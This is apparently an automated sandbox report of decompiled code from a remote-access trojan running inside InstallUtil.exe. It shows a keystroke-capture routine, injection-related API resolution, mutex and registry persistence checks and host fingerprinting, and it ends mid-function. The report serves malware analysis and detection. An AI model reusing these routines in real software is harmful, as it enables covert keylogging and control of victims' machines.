45334->45336 45337 401ec9 26 API calls 45335->45337 45336->45273 45338 409c9e 45337->45338 45339 401ec9 26 API calls 45338->45339 45340 409caa 45339->45340 45341 401f98 26 API calls 45340->45341 45341->45331 45342->45282 45343->45282 45344->45290 45346 4337a0 ___scrt_fastfail 45345->45346 45347 408bbb 6 API calls 45346->45347 45348 40413e 28 API calls 45347->45348 45349 408c25 45348->45349 45360 408d60 27 API calls 45349->45360 45350->45307 45351->45316 45352->45320 45353->45323 45354->45308 45355->45312 45356->45315 45357->45319 45358->45324 45359->45328 45360->45336 45361 43f80d 45362 43f816 45361->45362 45367 43f82f 45361->45367 45363 43f81e 45362->45363 45368 43f86b 45362->45368 45365 43f826 45365->45363 45381 43fb12 22 API calls 2 library calls 45365->45381 45369 43f877 45368->45369 45370 43f874 45368->45370 45371 44ad49 51 API calls 45369->45371 45370->45365 45372 43f87e 45371->45372 45382 44b0cb GetEnvironmentStringsW 45372->45382 45375 43f889 45396 4427c2 20 API calls _free 45375->45396 45378 43f8be 45378->45365 45379 43f894 45395 4427c2 20 API calls _free 45379->45395 45381->45367 45383 44b0e2 45382->45383 45393 44b135 45382->45393 45386 44b0e8 WideCharToMultiByte 45383->45386 45384 43f883 45384->45375 45394 43f918 26 API calls 4 library calls 45384->45394 45385 44b13e FreeEnvironmentStringsW 45385->45384 45387 44b104 45386->45387 45386->45393 45397 4421f7 45387->45397 45390 44b111 WideCharToMultiByte 45391 44b127 45390->45391 45404 4427c2 20 API calls _free 45391->45404 45393->45384 45393->45385 45394->45379 45395->45375 45396->45378 45398 442235 45397->45398 45403 442205 __Getctype 45397->45403 45406 439941 20 API calls std::_Deallocate 45398->45406 45400 442220 RtlAllocateHeap 45401 442233 45400->45401 45400->45403 45401->45390 45401->45391 45403->45398 45403->45400 45405 43f040 7 API calls 2 library calls 45403->45405 45404->45393 45405->45403 45406->45401 45407 40161e 45408 401626 45407->45408 45409 401629 45407->45409 45410 401668 45409->45410 45413 
401656 45409->45413 45411 430e1b new 22 API calls 45410->45411 45412 40165c 45411->45412 45414 430e1b new 22 API calls 45413->45414 45414->45412 45415 43f83c 45416 43f845 45415->45416 45421 43f85e 45415->45421 45417 43f84d 45416->45417 45422 43f8c4 45416->45422 45419 43f855 45419->45417 45433 43fb91 22 API calls 2 library calls 45419->45433 45423 43f8d0 45422->45423 45424 43f8cd 45422->45424 45434 44b14e GetEnvironmentStringsW 45423->45434 45424->45419 45427 43f8dd 45443 4427c2 20 API calls _free 45427->45443 45430 43f912 45430->45419 45431 43f8e8 45442 4427c2 20 API calls _free 45431->45442 45433->45421 45435 44b162 45434->45435 45436 43f8d7 45434->45436 45437 4421f7 ___crtLCMapStringA 21 API calls 45435->45437 45436->45427 45441 43f9e9 26 API calls 3 library calls 45436->45441 45439 44b176 ctype 45437->45439 45444 4427c2 20 API calls _free 45439->45444 45440 44b190 FreeEnvironmentStringsW 45440->45436 45441->45431 45442->45427 45443->45430 45444->45440

Control-flow Graph

C-Code - Quality: 100%
E0040CE58() {
	struct HINSTANCE__* _t1;
	_Unknown_base(*)()* _t2;
	_Unknown_base(*)()* _t8;
	_Unknown_base(*)()* _t16;
	_Unknown_base(*)()* _t26;
	CHAR* _t34;
	CHAR* _t35;
	CHAR* _t36;
	CHAR* _t37;

	_t34 = "GetModuleFileNameExA";
	_t1 = LoadLibraryA("Psapi.dll"); // executed
	_t2 = GetProcAddress(_t1, _t34);
	 *0x46dd24 = _t2;
	if(_t2 == 0) {
		 *0x46dd24 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t34);
	}
	_t35 = "GetModuleFileNameExW";
	 *0x46dd14 = GetProcAddress(LoadLibraryA("Psapi.dll"), _t35);
	if( *0x46dd24 == 0) {
		 *0x46dd14 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t35);
	}
	 *0x46dd1c = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
	_t8 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
	_t36 = "kernel32";
	 *0x46dd08 = _t8;
	 *0x46dea0 = GetProcAddress(GetModuleHandleA(_t36), "IsWow64Process");
	 *0x46dea4 = GetProcAddress(GetModuleHandleA(_t36), "GetComputerNameExW");
	 *0x46dd18 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
	_t16 = GetProcAddress(GetModuleHandleA(_t36), "SetProcessDEPPolicy");
	_t37 = "user32";
	 *0x46dd0c = _t16;
	 *0x46dd28 = GetProcAddress(GetModuleHandleA(_t37), "EnumDisplayDevicesW");
	 *0x46dd2c = GetProcAddress(GetModuleHandleA(_t37), "EnumDisplayMonitors");
	 *0x46dd10 = GetProcAddress(GetModuleHandleA(_t37), "GetMonitorInfoW");
	 *0x46deac = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
	_t26 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
	 *0x46dd04 = _t26;
	return _t26;
}


APIs
• LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0046E600,0046E5D0,?,00000001,0040C650), ref: 0040CE6D
• GetProcAddress.KERNEL32(00000000), ref: 0040CE76
• GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,00000001,0040C650), ref: 0040CE8D
• GetProcAddress.KERNEL32(00000000), ref: 0040CE90
• LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,00000001,0040C650), ref: 0040CEA2
• GetProcAddress.KERNEL32(00000000), ref: 0040CEA5
• GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,00000001,0040C650), ref: 0040CEBB
• GetProcAddress.KERNEL32(00000000), ref: 0040CEBE
• LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000001,0040C650), ref: 0040CECF
• GetProcAddress.KERNEL32(00000000), ref: 0040CED2
• LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,00000001,0040C650), ref: 0040CEE3
• GetProcAddress.KERNEL32(00000000), ref: 0040CEE6
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,00000001,0040C650), ref: 0040CEF8
• GetProcAddress.KERNEL32(00000000), ref: 0040CEFB
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,00000001,0040C650), ref: 0040CF08
• GetProcAddress.KERNEL32(00000000), ref: 0040CF0B
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,00000001,0040C650), ref: 0040CF1C
• GetProcAddress.KERNEL32(00000000), ref: 0040CF1F
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,00000001,0040C650), ref: 0040CF2C
• GetProcAddress.KERNEL32(00000000), ref: 0040CF2F
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,00000001,0040C650), ref: 0040CF41
• GetProcAddress.KERNEL32(00000000), ref: 0040CF44
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,00000001,0040C650), ref: 0040CF51
• GetProcAddress.KERNEL32(00000000), ref: 0040CF54
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,00000001,0040C650), ref: 0040CF61
• GetProcAddress.KERNEL32(00000000), ref: 0040CF64
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,00000001,0040C650), ref: 0040CF75
• GetProcAddress.KERNEL32(00000000), ref: 0040CF78
• LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,00000001,0040C650), ref: 0040CF86
• GetProcAddress.KERNEL32(00000000), ref: 0040CF89
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule$LibraryLoad
• String ID: Rv$0:v@O-t$EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
• API String ID: 551388010-2073788189
• Opcode ID: 43b925e552e5baf02bd9721a00a74f41a809ff5129cb75e0d768a7e8c0109cfd
• Instruction ID: e53d2819f5ab833264721e4a6df811b5f9d97970b720a2c2ed5f3284e83987ef
• Opcode Fuzzy Hash: 43b925e552e5baf02bd9721a00a74f41a809ff5129cb75e0d768a7e8c0109cfd
• Instruction Fuzzy Hash: DF311EA0F4131C7ADB107BB6EC49E1B3E9CDA847557290427F90497160FBBDD8008EAE
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 91%
E00408B9A(void* __ecx, intOrPtr _a4) {
	long _v8;
	void _v38;
	short _v40;
	char _v296;
	void* __ebx;
	void* __edi;
	void* __ebp;
	struct HWND__* _t18;
	struct HKL__* _t20;
	void* _t30;
	signed int _t32;
	void* _t36;
	void* _t37;
	void* _t41;

	_t30 = __ecx;
	E004337A0(_t37,  &_v296, 0, 0x100);
	_v40 = 0;
	_t32 = 7;
	memset( &_v38, 0, _t32 << 2);
	asm("stosw"); // executed
	_t18 = GetForegroundWindow(); // executed
	_t20 = GetKeyboardLayout(GetWindowThreadProcessId(_t18,  &_v8));
	GetKeyState(0x10);
	GetKeyboardState( &_v296);
	_t9 = _t30 + 0x50; // 0x5b
	_t10 = _t30 + 0x4c; // 0x5b
	ToUnicodeEx( *_t10,  *_t9,  &_v296,  &_v40, 0x10, 0, _t20);
	E0040413E(_t30, _a4, _t36, _t41,  &_v40);
	return _a4;
}


APIs
• GetForegroundWindow.USER32(0046E3A8,?,0046E3A8), ref: 00408BCE
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00408BD9
• GetKeyboardLayout.USER32(00000000), ref: 00408BE0
• GetKeyState.USER32(00000010), ref: 00408BEA
• GetKeyboardState.USER32(?), ref: 00408BF7
• ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 00408C13
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
• String ID:
• API String ID: 3566172867-0
• Opcode ID: 948a40d59b5c6c784c9d44c9a89de6858e64e2d2692255a54a1a9a25f5ddf5ee
• Instruction ID: 7da8684ef6d527c699a06cf7657daa54a6c573ffa1226931308c06a0ed1158a4
• Opcode Fuzzy Hash: 948a40d59b5c6c784c9d44c9a89de6858e64e2d2692255a54a1a9a25f5ddf5ee
• Instruction Fuzzy Hash: DF115671A00308ABDB10DBE0EC49FDA77BCEB4C716F000465FA04DA151E675E9548B64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 47%
E0040D26E() {
	signed int _v32;
	void* _t13;
	void* _t22;
                                                                      				char* _t62;
                                                                      				signed int _t63;
                                                                      				void* _t65;
                                                                      				void* _t66;
                                                                      				void* _t68;
                                                                      
                                                                      				_t65 = (_t63 & 0xfffffff8) - 0x1c;
                                                                      				_t62 = L"pth_unenc";
                                                                      				while(1) {
                                                                      					_v32 = _v32 & 0x00000000;
                                                                      					_t52 = E00401F6B(0x46e5a0); // executed
                                                                      					E00410AC0(_t10, "override",  &_v32); // executed
                                                                      					_t13 = _v32 - 1;
                                                                      					if(_t13 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					_t22 = _t13 - 1;
                                                                      					if(_t22 == 0) {
                                                                      						_push(1);
                                                                      						_t69 = _t65 - 0x18;
                                                                      						E0040773A(0x46e588, _t65 - 0x18, _t52, __eflags, 0x46e588);
                                                                      						_push(_t62);
                                                                      						E00410D87(0x80000001, E00401EC4(E00418385( &_v32, 0x46e5a0)));
                                                                      						E00401EC9();
                                                                      						_push(1);
                                                                      						E00402053(0x46e588, _t69 + 0x20 - 0x18, _t25, _t62, "3.5.1 Pro");
                                                                      						_push("v");
                                                                      						E00410CE2(0x46e5a0, E00401F6B(0x46e5a0));
                                                                      						E0041030A();
                                                                      						ExitProcess(0);
                                                                      					}
                                                                      					_t76 = _t22 != 1;
                                                                      					if(_t22 != 1) {
                                                                      						L6:
                                                                      						Sleep(0xbb8); // executed
                                                                      						continue;
                                                                      					}
                                                                      					E0040AED1();
                                                                      					L5:
                                                                      					_push(1);
                                                                      					_t66 = _t65 - 0x18;
                                                                      					E0040773A(0x46e588, _t66, _t52, _t76, 0x46e588);
                                                                      					_push(_t62);
                                                                      					E00410D87(0x80000001, E00401EC4(E00418385( &_v32, 0x46e5a0)));
                                                                      					E00401EC9();
                                                                      					_push(1);
                                                                      					_t68 = _t66 + 0x20 - 0x18;
                                                                      					E00402053(0x46e588, _t68, _t16, _t62, "3.5.1 Pro");
                                                                      					_push("v");
                                                                      					E00410CE2(0x46e5a0, E00401F6B(0x46e5a0));
                                                                      					_t65 = _t68 + 0x20;
                                                                      					goto L6;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00410AC0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410AE0
                                                                        • Part of subcall function 00410AC0: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046E5A0), ref: 00410AFE
                                                                        • Part of subcall function 00410AC0: RegCloseKey.KERNELBASE(?), ref: 00410B09
                                                                      • Sleep.KERNELBASE(00000BB8), ref: 0040D324
                                                                      • ExitProcess.KERNEL32 ref: 0040D395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                                      • String ID: 3.5.1 Pro$override$pth_unenc
                                                                      • API String ID: 2281282204-2766964638
                                                                      • Opcode ID: d42db16a73d2b299e34e6e701a5e5d38101fba342da901ceb8717055ad643507
                                                                      • Instruction ID: d1120813b3f21031d6dd82f740c6fbd7598bde36b3a99e6f3a72782d7190e4a5
                                                                      • Opcode Fuzzy Hash: d42db16a73d2b299e34e6e701a5e5d38101fba342da901ceb8717055ad643507
                                                                      • Instruction Fuzzy Hash: 5C21E431B503002BD60876768C57AAE328A6B81708F50452EF802662D7FEBD998143DF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Control-flow Graph
                                                                      C-Code - Quality: 91%
                                                                      			E00404F28(void* __ecx, intOrPtr _a4, char _a8) {
                                                                      				struct _SYSTEMTIME _v20;
                                                                      				char _v44;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t16;
                                                                      				void* _t21;
                                                                      				intOrPtr _t29;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      
                                                                      				_t31 = __ecx;
                                                                      				if( *((char*)(__ecx + 0x5c)) != 0) {
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				}
                                                                      				_t29 = _a4;
                                                                      				if(_a8 != 0) {
                                                                      					__eflags =  *0x46dd00;
                                                                      					if( *0x46dd00 != 0) {
                                                                      						GetLocalTime( &_v20);
                                                                      						_t16 = E004182D1(_t21,  &_v44, _t29);
                                                                      						_t34 = _t33 - 0x18;
                                                                      						E004052D4(_t21, _t33 - 0x18, "Connection KeepAlive  | Enabled | Timeout: ", _t32, __eflags, _t16);
                                                                      						E00402053(_t21, _t34 - 0x14, "Connection KeepAlive  | Enabled | Timeout: ", _t32, "i");
                                                                      						E00417D02(_t21, _t29);
                                                                      						E00401F98();
                                                                      					}
                                                                      				} else {
                                                                      					 *((char*)(__ecx + 0x7c)) = 1;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
                                                                      				 *((char*)(_t31 + 0x5c)) = 1;
                                                                      				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
                                                                      				CreateThread(0, 0, E00405127, _t31, 0, 0); // executed
                                                                      				return 1;
                                                                      			}

                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00404F58
                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FA4
                                                                      • CreateThread.KERNELBASE ref: 00404FB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$EventLocalThreadTime
                                                                      • String ID: Connection KeepAlive | Enabled | Timeout: $Cv
                                                                      • API String ID: 2532271599-1310892454
                                                                      • Opcode ID: 576fe39332595e36781d7cb5d99bdc465d064b268043dbba1b145fb5da2b35e9
                                                                      • Instruction ID: d000502f81133dfc4abed3a50014e83e98711da89c200911bc51b302f97f34d6
                                                                      • Opcode Fuzzy Hash: 576fe39332595e36781d7cb5d99bdc465d064b268043dbba1b145fb5da2b35e9
                                                                      • Instruction Fuzzy Hash: 8A1127718003846BCB20B7779C0DAAB7FB8DBD2304F00416FF401621C1D6B89481CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00417E20(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                      				char _v8;
                                                                      				long _v12;
                                                                      				char _v36;
                                                                      				char _v60;
                                                                      				char _v92;
                                                                      				short _v604;
                                                                      				void* __ebp;
                                                                      				void* _t26;
                                                                      				void* _t35;
                                                                      				void* _t39;
                                                                      				void* _t40;
                                                                      				void* _t41;
                                                                      
                                                                      				_t41 = __eflags;
                                                                      				_t35 = __edx;
                                                                      				_v8 = 0x10;
                                                                      				_t39 = __ecx;
                                                                      				 *0x46dea4(1,  &_v92,  &_v8); // executed
                                                                      				_v12 = 0x100;
                                                                      				GetUserNameW( &_v604,  &_v12); // executed
                                                                      				E00402FD4(_t26, _t39, E004042BC(_t26,  &_v36,  &_v92, _t40, _t41, E0040413E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				return _t39;
                                                                      			}

                                                                      APIs
                                                                      • GetComputerNameExW.KERNEL32(00000001,?,00000037,0046E600), ref: 00417E3D
                                                                      • GetUserNameW.ADVAPI32(?,00000010), ref: 00417E55
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name$ComputerUser
                                                                      • String ID:
                                                                      • API String ID: 4229901323-0
                                                                      • Opcode ID: ab7916ae7f281988d52d5737a4608a67ebbc609fc9bb9014e12e4135e60b441a
                                                                      • Instruction ID: 80a01cbd77c97b4f1a2cf110af2dd5b8c062d9d1aae85597091ace35d732fe0b
                                                                      • Opcode Fuzzy Hash: ab7916ae7f281988d52d5737a4608a67ebbc609fc9bb9014e12e4135e60b441a
                                                                      • Instruction Fuzzy Hash: A401127290011DABCB04EBD1DC45ADEB7BCEF44309F1001ABF905B7195EEB46A898B98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00431495() {
                                                                      				_Unknown_base(*)()* _t1;
                                                                      
                                                                      				_t1 = SetUnhandledExceptionFilter(E004314A1); // executed
                                                                      				return _t1;
                                                                      			}

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_000314A1,004311C8), ref: 0043149A
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: a482db5cbd8483212d6586fce34e842ad419a1a270e0650f29ba0b8240e57ce5
                                                                      • Instruction ID: 6638a1f7829419bbe7e05c502f7de8475a6af96e41fc6a415c287828778d49fa
                                                                      • Opcode Fuzzy Hash: a482db5cbd8483212d6586fce34e842ad419a1a270e0650f29ba0b8240e57ce5
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Control-flow Graph
                                                                      C-Code - Quality: 89%
                                                                      			E0040C3E8(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
                                                                      				char _v524;
                                                                      				char _v700;
                                                                      				char _v720;
                                                                      				char _v724;
                                                                      				char _v728;
                                                                      				char _v744;
                                                                      				char _v756;
                                                                      				char _v760;
                                                                      				char _v772;
                                                                      				struct _SECURITY_ATTRIBUTES* _v776;
                                                                      				signed int _v780;
                                                                      				char _v784;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t67;
                                                                      				void* _t70;
                                                                      				void* _t75;
                                                                      				void** _t83;
                                                                      				CHAR* _t88;
                                                                      				long _t90;
                                                                      				int _t92;
                                                                      				char _t95;
                                                                      				void* _t96;
                                                                      				void* _t100;
                                                                      				void* _t116;
                                                                      				void* _t117;
                                                                      				void* _t124;
                                                                      				char _t130;
                                                                      				char* _t135;
                                                                      				signed char* _t137;
                                                                      				signed char* _t139;
                                                                      				void* _t142;
                                                                      				void* _t144;
                                                                      				void* _t158;
                                                                      				void* _t161;
                                                                      				void* _t163;
                                                                      				void* _t164;
                                                                      				intOrPtr _t180;
                                                                      				intOrPtr* _t183;
                                                                      				void* _t185;
                                                                      				void* _t191;
                                                                      				char* _t194;
                                                                      				void* _t197;
                                                                      				char* _t200;
                                                                      				void* _t207;
                                                                      				void* _t213;
                                                                      				void* _t214;
                                                                      				signed int _t215;
                                                                      				char* _t222;
                                                                      				void* _t224;
                                                                      				char* _t227;
                                                                      				char* _t229;
                                                                      				intOrPtr* _t231;
                                                                      				void* _t233;
                                                                      				intOrPtr* _t241;
                                                                      				void* _t243;
                                                                      				void* _t251;
                                                                      				void* _t271;
                                                                      				struct _SECURITY_ATTRIBUTES* _t272;
                                                                      				int _t274;
                                                                      				intOrPtr* _t289;
                                                                      				char* _t366;
                                                                      				signed int _t388;
                                                                      				signed int _t392;
                                                                      				int _t394;
                                                                      				signed int _t400;
                                                                      				signed int _t417;
                                                                      				void* _t439;
                                                                      				void* _t441;
                                                                      				signed int _t463;
                                                                      				void* _t467;
                                                                      				char* _t468;
                                                                      				char* _t471;
                                                                      				intOrPtr* _t484;
                                                                      				void* _t487;
                                                                      				void* _t488;
                                                                      				void* _t489;
                                                                      				void* _t491;
                                                                      				signed int _t494;
                                                                      				signed int _t496;
                                                                      				void* _t499;
                                                                      				void* _t500;
                                                                      				void* _t501;
                                                                      				void* _t503;
                                                                      				void* _t505;
                                                                      				void* _t506;
                                                                      				void* _t507;
                                                                      				void* _t508;
                                                                      				void* _t509;
                                                                      				void* _t513;
                                                                      
                                                                      				_t455 = __edx;
                                                                      				_t494 = _t496;
                                                                      				 *0x46dd20 = _a4;
                                                                      				_push(_t271);
                                                                      				E0040CDA7(_a4,  &_v724, __edx, __eflags);
                                                                      				_t499 = (_t496 & 0xfffffff8) - 0x2f4;
                                                                      				E004020B6(_t271, _t499, __edx, __eflags, 0x46e624);
                                                                      				_t500 = _t499 - 0x18;
                                                                      				E004020B6(_t271, _t500, __edx, __eflags,  &_v728);
                                                                      				_t67 = E0041851D( &_v756, __edx);
                                                                      				_t501 = _t500 + 0x30;
                                                                      				E0040D644(__edx, _t67);
                                                                      				E00401E4D( &_v760, _t455);
                                                                      				_t70 = E00438EB0(_a12, "-l");
                                                                      				_t289 = _t467;
                                                                      				if(_t70 != 0) {
                                                                      					_t468 = 0x46e600;
                                                                      					__eflags =  *((char*)(E00401F6B(E00401E25(0x46e600, _t455, _t494, __eflags, 3))));
                                                                      					 *0x46daf6 = __eflags != 0;
                                                                      					_t457 = E004052F5( &_v780, "Software\\", _t494, E00401E25(0x46e600, _t455, _t494, __eflags, 0xe));
                                                                      					_t75 = E0040793B(_t271,  &_v756, _t74, 0x46e600, _t494, __eflags, "\\");
                                                                      					_t477 = 0x46e5a0;
                                                                      					E00401FA2(0x46e5a0, _t74, 0x46e5a0, _t75);
                                                                      					E00401F98();
                                                                      					E00401F98();
                                                                      					L00405A7D(_t271, 0x46e654, _t74, "Exe");
                                                                      					_t272 = 0;
                                                                      					E00401E25(0x46e600, _t74, _t494, __eflags, 0x32);
                                                                      					__eflags =  *(E004051BA(0));
                                                                      					 *0x46dd03 = __eflags != 0;
                                                                      					E00401E25(0x46e600, _t74, _t494, __eflags, 0x33);
                                                                      					_t83 = E004051BA(0);
                                                                      					__eflags =  *_t83;
                                                                      					 *0x46dd58 =  *_t83 != 0;
                                                                      					__eflags =  *0x46dd03 - _t272; // 0x0
                                                                      					if(__eflags == 0) {
                                                                      						L6:
                                                                      						_v776 = _t272;
                                                                      						E00401E25(_t468, _t457, _t494, __eflags, 0xd);
                                                                      						_t458 = "0";
                                                                      						__eflags = E0040ECD0(__eflags);
                                                                      						if(__eflags != 0) {
                                                                      							_t491 = OpenMutexA(0x100000, _t272, E00401F6B(E00401E25(_t468, "0", _t494, __eflags, 7)));
                                                                      							__eflags = _t491;
                                                                      							if(_t491 != 0) {
                                                                      								WaitForSingleObject(_t491, 0xea60);
                                                                      								CloseHandle(_t491);
                                                                      							}
                                                                      							_t458 = E00401F6B(0x46e5a0);
                                                                      							__eflags = E00410AC0(_t260, "Inj",  &_v776);
                                                                      							if(__eflags != 0) {
                                                                      								_t458 = E00401F6B(0x46e5a0);
                                                                      								E00410F1D(_t262, __eflags, "Inj");
                                                                      							}
                                                                      						}
                                                                      						E00401F80(0x46e5d0, E00401E25(_t468, _t458, _t494, __eflags, 0xe));
                                                                      						_t88 = E00401F6B(0x46e5d0);
                                                                      						_t274 = 1;
                                                                      						CreateMutexA(0, 1, _t88); // executed
                                                                      						_t90 = GetLastError();
                                                                      						__eflags = _t90 - 0xb7;
                                                                      						if(_t90 == 0xb7) {
                                                                      							L40:
                                                                      							E00401F98();
                                                                      							_t92 = _t274;
                                                                      							goto L3;
                                                                      						} else {
                                                                      							E0040CE58();
                                                                      							GetModuleFileNameW(0, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", 0x104);
                                                                      							_t95 = E004186B9(0x46e5d0);
                                                                      							_push(0x46e5d0);
                                                                      							_t459 = 0x80000002;
                                                                      							 *0x46dea8 = _t95;
                                                                      							_t96 = E00410B1D( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                                                                      							_t503 = _t501 + 0xc;
                                                                      							_t480 = 0x46e63c;
                                                                      							E00401FA2(0x46e63c, 0x80000002, 0x46e63c, _t96);
                                                                      							E00401F98();
                                                                      							__eflags =  *0x46dea8;
                                                                      							if( *0x46dea8 == 0) {
                                                                      								_push(" (32 bit)");
                                                                      							} else {
                                                                      								_push(" (64 bit)");
                                                                      							}
                                                                      							L00405354(_t274, 0x46e63c, _t459, _t468, _t494);
                                                                      							_t100 =  *0x46dd18;
                                                                      							__eflags = _t100;
                                                                      							if(_t100 != 0) {
                                                                      								 *0x46c9c0 =  *_t100();
                                                                      							}
                                                                      							__eflags = _v776;
                                                                      							if(__eflags == 0) {
                                                                      								_t439 = E00401E25(_t468, _t459, _t494, __eflags, 0x2e);
                                                                      								__eflags =  *((char*)(E00401F6B(_t439)));
                                                                      								if(__eflags != 0) {
                                                                      									__eflags =  *0x46dd18;
                                                                      									if(__eflags != 0) {
                                                                      										__eflags =  *0x46c9c0;
                                                                      										if( *0x46c9c0 == 0) {
                                                                      											_t459 = E00401F6B(0x46e5a0);
                                                                      											_t251 = E00410A76(0x46e5a0, _t250, "origmsc");
                                                                      											_pop(_t441);
                                                                      											__eflags = _t251;
                                                                      											if(__eflags == 0) {
                                                                      												E00405FCD(_t274, _t441, _t459);
                                                                      											}
                                                                      										} else {
                                                                      											_push(_t439);
                                                                      											_push(_t439);
                                                                      											__eflags = E0040A885() - 0xffffffff;
                                                                      											if(__eflags == 0) {
                                                                      												E004060C7(__eflags);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x27))));
                                                                      							if(__eflags != 0) {
                                                                      								E0040D5E2();
                                                                      							}
                                                                      							L00409F8A(_t274, 0x46e570, _t459, E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0xb)));
                                                                      							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 4))));
                                                                      							 *0x46daf7 = __eflags != 0;
                                                                      							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 5))));
